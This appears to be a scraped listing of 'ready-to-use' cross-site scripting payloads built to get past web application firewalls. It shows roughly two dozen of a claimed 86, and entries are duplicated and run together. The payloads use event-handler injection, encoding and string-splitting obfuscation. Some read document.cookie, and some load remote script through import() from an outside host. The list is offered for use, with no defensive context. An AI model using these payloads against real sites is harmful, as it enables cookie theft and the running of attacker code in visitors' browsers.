XSS WAF Bypass
86 ready-to-use payloads
>"><img/src/onerror=import('//domain/')>"@yourdomain
XSS WAF bypass — event handler injection
>"><img/src/onerror=import('//domain/')>"@yourdomain013371337;ext=<img/src/onerror=import('//domain/')>
XSS WAF bypass — event handler injection
013371337;ext=<img/src/onerror=import('//domain/')><Svg Only=1 OnLoad=confirm(document.domain)>
XSS WAF bypass — popup confirmation
<Svg Only=1 OnLoad=confirm(document.domain)>
<Svg/OnLoad=alert(1337)>"@gmail.com
XSS WAF bypass — popup confirmation
<Svg/OnLoad=alert(1337)>"@gmail.com
<Svg Only=1 OnLoad=confirm(atob("Q2xvdWRmbGFyZSBCe...
XSS WAF bypass — popup confirmation
<Svg Only=1 OnLoad=confirm(atob("Q2xvdWRmbGFyZSBCeXBhc3NlZCA6KQ=="))><svg onload=alert(document.cookie)>
XSS WAF bypass — event handler injection
<svg onload=alert(document.cookie)>
<svg onload=alert("1")><"">
XSS WAF bypass — event handler injection
<svg onload=alert("1")><"">
<Img Src=//X55.is OnLoad%0C=import(Src)>
XSS WAF bypass — event handler injection
<Img Src=//X55.is OnLoad%0C=import(Src)>
%3csvg/onload=window%5b"al"+"ert"%5d`1337`%3e
XSS WAF bypass — event handler injection
%3csvg/onload=window%5b"al"+"ert"%5d`1337`%3e
%3Csvg%20onload=alert(%22MrHex88%22)%3E
XSS WAF bypass — popup confirmation
%3Csvg%20onload=alert(%22MrHex88%22)%3E
</script>'"<img src=x onError=prompt(1)>
XSS WAF bypass — event handler injection
</script>'"<img src=x onError=prompt(1)>
">\]<img src=x onerror=alert(document.domain)>
XSS WAF bypass — popup confirmation
">\]<img src=x onerror=alert(document.domain)>
%3Cimg%20src=x%20onerror=alert(%22MrHex88%22)%3E
XSS WAF bypass — popup confirmation
%3Cimg%20src=x%20onerror=alert(%22MrHex88%22)%3E
"><svg onmouseover="confirm(document.domain)
XSS WAF bypass — popup confirmation
"><svg onmouseover="confirm(document.domain)
<Img Src=OnXSS OnError=confirm(1337)>
XSS WAF bypass — popup confirmation
<Img Src=OnXSS OnError=confirm(1337)>
'"><A HRef=\" AutoFocus OnFocus=top/**/?.['ale'%2B...
XSS WAF bypass — encoding/comment obfuscation
'"><A HRef=\" AutoFocus OnFocus=top/**/?.['ale'%2B'rt'](1)>
'%3e%3cscript%3ealert(5*5)%3c%2fscript%3eejj4sbx5w4o
XSS WAF bypass — popup confirmation
'%3e%3cscript%3ealert(5*5)%3c%2fscript%3eejj4sbx5w4o
javascript:var a="ale";var b="rt";var c="()";decod...
XSS WAF bypass — char code obfuscation
javascript:var a="ale";var b="rt";var c="()";decodeURI("<button popovertarget=x>Click me</button><hvita onbeforetoggle="+a+b+c+" popover id=x>Hvita</hvita>")<a/href="javascript:Reflect.get(frames,'ale'+'rt')...
XSS WAF bypass payload
<a/href="javascript:Reflect.get(frames,'ale'+'rt')(Reflect.get(document,'coo'+'kie'))">ClickMe
<Script>window.valueOf=alert;window%2B1</Script>
XSS WAF bypass — encoding/comment obfuscation
<Script>window.valueOf=alert;window%2B1</Script>
<svg/onload=location=location.hash.substr(1)>#java...
XSS WAF bypass — popup confirmation
<svg/onload=location=location.hash.substr(1)>#javascript:alert(1)
"><form onformdata%3Dwindow.confirm(cookie)><butto...
XSS WAF bypass — popup confirmation
"><form onformdata%3Dwindow.confirm(cookie)><button>XSS here<!--
1%22onfocus=%27alert%28document.cookie%29%27%20aut...
XSS WAF bypass — encoding/comment obfuscation
1%22onfocus=%27alert%28document.cookie%29%27%20autofocus=
1%22onfocus=%27window.alert%28document.cookie%29%2...
XSS WAF bypass — encoding/comment obfuscation
1%22onfocus=%27window.alert%28document.cookie%29%27%20autofocus=
"><U0001d618U0001d623U0001d61c+U0001d63cU0001d62dU...
XSS WAF bypass payload
"><U0001d618U0001d623U0001d61c+U0001d63cU0001d62dU0001d62cU0001d61aU0001d63d=U0001d63cU0001d62eU0001d62dU0001d61bU0001d63cU0001d634U0001d62c(U0001d63cU0001d62eU0001d62eU0001d63aU0001d634U0001d62b)>